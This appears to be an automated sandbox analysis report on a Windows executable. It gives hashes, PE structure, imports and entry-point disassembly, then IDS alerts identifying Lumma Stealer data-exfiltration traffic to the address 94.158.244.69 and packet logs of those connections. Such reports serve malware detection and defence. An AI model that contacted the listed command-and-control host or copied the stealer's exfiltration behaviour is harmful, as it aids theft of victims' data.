                                                            Preview:MDMP..a..... .......hw4g............4...............H.......<...........T...."..........`.......8...........T............?..\`..........L...........8...............................................................................eJ..............GenuineIntel............T....... ....v4gK............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8336
                                                            Entropy (8bit):3.708593303505153
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJOgM6v6YcD3SUlgmfuSbN/pDM89bwesf0Nwm:R6lXJ06v6YwSUlgmf9Twdfi
                                                            MD5:DA2AFDE5FE0FEB6C2A9893C9B5ADD17B
                                                            SHA1:48DC364475F4E185DA7A79CF6745671279AE5AE0
                                                            SHA-256:73B8C41740BDA5BEDA0D545878B5220CD01CBB2E60CAD0E4381AEEFE72370479
                                                            SHA-512:02C0F201C67B010E504111A1C3DB217D92CCA8E3371531BFDCB63E27DE9C64B2FEA9E84F420D6099C9701110AF230B7150F0D0C5F818CDD4EC43E443D56E9998
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.1.2.<./.P.i.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4583
                                                            Entropy (8bit):4.481190618608644
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zscJg77aI9uYCfWpW8VYvoYm8M4JTAwoFfTa+q8r/IbA13d:uIjfaI75h7VYJTxea2/qA13d
                                                            MD5:309E006A8FD828B10095014B0400A273
                                                            SHA1:15FA08D98C489B8CC5E68682EF288AE1F2F8D6AD
                                                            SHA-256:9ACBEE835D5F641C7B34E6F8F71B91F2F0793BD72F8B6E47F570C7338CB84C3E
                                                            SHA-512:60C24E7C5FD90045D5E977271631549FD78B279FC0B34C11F3DD1A71B65267FED822F584E2B5F150827911C996488EDFC531E5C9DF0EBB6C7DBE562468CE913E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586137" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.393958386606649
                                                            Encrypted:false
                                                            SSDEEP:6144:nl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAIOBSqa:l4vF0MYQUMM6VFYSIU
                                                            MD5:BB9B1CF0F943D8712B7DAD3F0B5081BC
                                                            SHA1:36BC33F006073159331DBCAA56284CD13433816D
                                                            SHA-256:7C12511DF68716527064059D51FCDD63FA55D13B3305E3A5296858FCB162AA34
                                                            SHA-512:C3AFC95E92CC33C3D745A89F1A425CF04B47874E947919B28F6AB57C10D4D40677517DF484FD722C05872089471424E000879B479A4D98085EAB27FA45E9ABF0
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....5.................................................................................................................................................................................................................................................................................................................................................'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.289105738110891
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:OlZzqwjrwO.exe
                                                            File size:476'672 bytes
                                                            MD5:30ca3a9970c190d36ef5ab08d64406e6
                                                            SHA1:fd44e251a898855a6c55e6fbd1eebbd807898052
                                                            SHA256:0f9e80e70619e5bf0a9ef86008d8d90315463f2ca4ca224172aa2d42bae2734e
                                                            SHA512:2019ad2f2c2d20f98075c8b1edcac49392d9c29b63bb3e802735ac20313cfafa2fa999c26418fd6b563d6b299f1228a47bde1da349577be1f4b49efbeb374d25
                                                            SSDEEP:12288:wIVsQqqGjd6eQ1YZVYcH4j1c45Wyv7d7JV:wI+1d6Qwcy1Yyv57
                                                            TLSH:53A4E01273A5A870E69706718E2EC2F8662FF9714F6566EB735C5B2F0E702E1C632305
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{p..............l.......l.......l.......b..........Z....l.......l.......l......Rich............PE..L....9.b...................
                                                            Icon Hash:c11121094d61973e
                                                            Entrypoint:0x40b34f
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x62EB3992 [Thu Aug 4 03:14:26 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:da3fdef870d17fb0b828d20b59c7836e
                                                            Instruction
                                                            call 00007F0A811FE7F6h
                                                            jmp 00007F0A811F7C6Eh
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            mov eax, dword ptr [ebp+08h]
                                                            xor ecx, ecx
                                                            cmp eax, dword ptr [0041F240h+ecx*8]
                                                            je 00007F0A811F7DF5h
                                                            inc ecx
                                                            cmp ecx, 2Dh
                                                            jc 00007F0A811F7DD3h
                                                            lea ecx, dword ptr [eax-13h]
                                                            cmp ecx, 11h
                                                            jnbe 00007F0A811F7DF0h
                                                            push 0000000Dh
                                                            pop eax
                                                            pop ebp
                                                            ret
                                                            mov eax, dword ptr [0041F244h+ecx*8]
                                                            pop ebp
                                                            ret
                                                            add eax, FFFFFF44h
                                                            push 0000000Eh
                                                            pop ecx
                                                            cmp ecx, eax
                                                            sbb eax, eax
                                                            and eax, ecx
                                                            add eax, 08h
                                                            pop ebp
                                                            ret
                                                            call 00007F0A811FB820h
                                                            test eax, eax
                                                            jne 00007F0A811F7DE8h
                                                            mov eax, 0041F3A8h
                                                            ret
                                                            add eax, 08h
                                                            ret
                                                            call 00007F0A811FB80Dh
                                                            test eax, eax
                                                            jne 00007F0A811F7DE8h
                                                            mov eax, 0041F3ACh
                                                            ret
                                                            add eax, 0Ch
                                                            ret
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            call 00007F0A811F7DC7h
                                                            mov ecx, dword ptr [ebp+08h]
                                                            push ecx
                                                            mov dword ptr [eax], ecx
                                                            call 00007F0A811F7D67h
                                                            pop ecx
                                                            mov esi, eax
                                                            call 00007F0A811F7DA1h
                                                            mov dword ptr [eax], esi
                                                            pop esi
                                                            pop ebp
                                                            ret
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 4Ch
                                                            mov eax, dword ptr [0041F3DCh]
                                                            xor eax, ebp
                                                            mov dword ptr [ebp-04h], eax
                                                            push ebx
                                                            xor ebx, ebx
                                                            push esi
                                                            mov esi, dword ptr [ebp+08h]
                                                            push edi
                                                            mov dword ptr [ebp-2Ch], ebx
                                                            mov dword ptr [ebp-1Ch], ebx
                                                            mov dword ptr [ebp-20h], ebx
                                                            mov dword ptr [ebp-28h], ebx
                                                            mov dword ptr [ebp-24h], ebx
                                                            mov dword ptr [ebp-4Ch], esi
                                                            mov dword ptr [ebp-48h], ebx
                                                            cmp dword ptr [esi+14h], ebx
                                                            Programming Language:
                                                            • [ASM] VS2010 build 30319
                                                            • [C++] VS2010 build 30319
                                                            • [ C ] VS2010 build 30319
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [RES] VS2010 build 30319
                                                            • [LNK] VS2010 build 30319
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1da540x3c.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2eb0000xb328.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44b80x40.text
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f0.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x1d5ce0x1d60007af0fdca3ba1062fca91c90337d9fdfFalse0.5259973404255319data6.510079872443372IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .data0x1f0000x2cad300x4b600e36af2ae5ed3478e8207007e442f02a6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .relo0x2ea0000x50x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x2eb0000xb3280xb4004f8d9aadfe6c2dd2aba3e5ddbb319fa2False0.38426649305555555data4.336248611841472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x2eb4b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.49684115523465705
                                                            RT_ICON0x2eb4b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.49684115523465705
                                                            RT_ICON0x2ebd580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5633640552995391
                                                            RT_ICON0x2ebd580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5633640552995391
                                                            RT_ICON0x2ec4200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5643063583815029
                                                            RT_ICON0x2ec4200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5643063583815029
                                                            RT_ICON0x2ec9880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4326923076923077
                                                            RT_ICON0x2ec9880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4326923076923077
                                                            RT_ICON0x2eda300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4192622950819672
                                                            RT_ICON0x2eda300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4192622950819672
                                                            RT_ICON0x2ee3b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4521276595744681
                                                            RT_ICON0x2ee3b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4521276595744681
                                                            RT_ICON0x2ee8800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.31663113006396587
                                                            RT_ICON0x2ee8800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.31663113006396587
                                                            RT_ICON0x2ef7280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.3916967509025271
                                                            RT_ICON0x2ef7280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.3916967509025271
                                                            RT_ICON0x2effd00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.4377880184331797
                                                            RT_ICON0x2effd00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.4377880184331797
                                                            RT_ICON0x2f06980x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.4190751445086705
                                                            RT_ICON0x2f06980x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.4190751445086705
                                                            RT_ICON0x2f0c000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.25570539419087135
                                                            RT_ICON0x2f0c000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.25570539419087135
                                                            RT_ICON0x2f31a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.29080675422138835
                                                            RT_ICON0x2f31a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.29080675422138835
                                                            RT_ICON0x2f42500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.3008196721311475
                                                            RT_ICON0x2f42500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.3008196721311475
                                                            RT_ICON0x2f4bd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.3351063829787234
                                                            RT_ICON0x2f4bd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.3351063829787234
                                                            RT_STRING0x2f53580x416dataTamilIndia0.4560229445506692
                                                            RT_STRING0x2f53580x416dataTamilSri Lanka0.4560229445506692
                                                            RT_STRING0x2f57700x360dataTamilIndia0.48032407407407407
                                                            RT_STRING0x2f57700x360dataTamilSri Lanka0.48032407407407407
                                                            RT_STRING0x2f5ad00x25edataTamilIndia0.4834983498349835
                                                            RT_STRING0x2f5ad00x25edataTamilSri Lanka0.4834983498349835
                                                            RT_STRING0x2f5d300x5f6dataTamilIndia0.4351245085190039
                                                            RT_STRING0x2f5d300x5f6dataTamilSri Lanka0.4351245085190039
                                                            RT_ACCELERATOR0x2f50b80x90dataTamilIndia0.6944444444444444
                                                            RT_ACCELERATOR0x2f50b80x90dataTamilSri Lanka0.6944444444444444
                                                            RT_GROUP_ICON0x2ee8200x5adataTamilIndia0.7222222222222222
                                                            RT_GROUP_ICON0x2ee8200x5adataTamilSri Lanka0.7222222222222222
                                                            RT_GROUP_ICON0x2f50400x76dataTamilIndia0.6779661016949152
                                                            RT_GROUP_ICON0x2f50400x76dataTamilSri Lanka0.6779661016949152
                                                            RT_VERSION0x2f51480x20cdata0.566793893129771
                                                            DLLImport
                                                            KERNEL32.dllSearchPathW, FindFirstChangeNotificationW, AllocConsole, GetConsoleAliasExesLengthA, LoadResource, InterlockedIncrement, WaitNamedPipeA, OpenSemaphoreA, FreeEnvironmentStringsA, MoveFileWithProgressA, EnumCalendarInfoExW, GetSystemTimeAsFileTime, EnumTimeFormatsA, SetProcessPriorityBoost, GetDriveTypeA, GetVolumePathNameW, GetPrivateProfileIntA, GetCalendarInfoA, GetFileAttributesW, SetSystemPowerState, lstrcatA, EnumSystemLocalesA, GetProfileIntA, DeleteFiber, GetLastError, GetCurrentDirectoryW, GlobalFix, SetComputerNameA, ResetEvent, LoadLibraryA, WriteConsoleA, GetProcessId, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, SetFileApisToANSI, QueryDosDeviceW, AddAtomA, GetPrivateProfileStructA, SetSystemTime, GlobalWire, GetModuleFileNameA, FindNextFileA, FindFirstVolumeMountPointA, CreateIoCompletionPort, GetModuleHandleA, CreateMailslotA, EnumDateFormatsW, CompareStringA, GetShortPathNameW, TerminateJobObject, FileTimeToLocalFileTime, EnumSystemLocalesW, GetProcAddress, GetVolumeNameForVolumeMountPointA, WideCharToMultiByte, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapAlloc, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, RaiseException, RtlUnwind, LCMapStringW, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, IsProcessorFeaturePresent, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetModuleFileNameW, SetFilePointer, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, IsValidLocale, GetConsoleCP, GetConsoleMode, LoadLibraryW, SetStdHandle, FlushFileBuffers, WriteConsoleW, CreateFileW, CloseHandle
                                                            GDI32.dllGetCharABCWidthsW
                                                            Language of compilation systemCountry where language is spokenMap
                                                            TamilIndia
                                                            TamilSri Lanka
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-13T10:51:52.398965+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94987394.158.244.6980TCP
                                                            2024-11-13T10:51:52.398965+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94997894.158.244.6980TCP
                                                            2024-11-13T10:52:40.340723+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.949791TCP
                                                            2024-11-13T10:52:53.109411+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94982294.158.244.6980TCP
                                                            2024-11-13T10:53:11.235764+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94992394.158.244.6980TCP
                                                            2024-11-13T10:53:17.926646+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.949976TCP
                                                            2024-11-13T10:53:20.255878+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94997494.158.244.6980TCP
                                                            2024-11-13T10:53:29.045691+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94997794.158.244.6980TCP
                                                            2024-11-13T10:53:47.122818+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94997994.158.244.6980TCP
                                                            2024-11-13T10:53:47.861590+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94998094.158.244.6980TCP
                                                            2024-11-13T10:53:47.861590+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.94998094.158.244.6980TCP
                                                            2024-11-13T10:54:05.396672+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94998194.158.244.6980TCP
                                                            2024-11-13T10:54:14.201356+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94998294.158.244.6980TCP
                                                            2024-11-13T10:54:23.154328+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94998394.158.244.6980TCP
                                                            2024-11-13T10:54:31.935365+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94998494.158.244.6980TCP
                                                            2024-11-13T10:54:40.737248+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94998594.158.244.6980TCP
                                                            2024-11-13T10:54:49.522715+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.94998694.158.244.6980TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 13, 2024 10:52:44.619086027 CET4982280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:44.624058962 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.624161005 CET4982280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:44.624311924 CET4982280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:44.624716043 CET4982280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:44.629642963 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.629723072 CET4982280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:44.630162954 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.630173922 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.630230904 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.630249977 CET4982280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:44.630259037 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.630309105 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.630317926 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.630367994 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.630376101 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.630392075 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.634717941 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.635080099 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.635122061 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.635133028 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:44.635154963 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.109304905 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.109411001 CET4982280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.110094070 CET4982280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.114996910 CET804982294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.674740076 CET4987380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.679919004 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.680027962 CET4987380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.680162907 CET4987380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.680804014 CET4987380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.684933901 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.685009003 CET4987380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.685739994 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.685750008 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.685786963 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.685796022 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.685817957 CET4987380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.685841084 CET4987380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:52:53.685868025 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.685877085 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.685960054 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.686005116 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.686012983 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.690030098 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.690732002 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.690767050 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.690774918 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.690814972 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.690823078 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:52:53.733715057 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:02.153971910 CET804987394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:02.742502928 CET4992380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:02.747481108 CET804992394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:02.747551918 CET4992380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:02.747658968 CET4992380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:02.748101950 CET4992380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:02.752469063 CET804992394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:02.752840996 CET804992394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:11.235680103 CET804992394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:11.235764027 CET4992380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:11.235816956 CET4992380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:11.240751982 CET804992394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:11.767182112 CET4997480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:11.772233963 CET804997494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:11.772321939 CET4997480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:11.772420883 CET4997480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:11.772795916 CET4997480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:11.777996063 CET804997494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:11.778014898 CET804997494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:20.255733013 CET804997494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:20.255877972 CET4997480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:20.255959034 CET4997480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:20.260770082 CET804997494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:20.550889015 CET4997780192.168.2.994.158.244.69
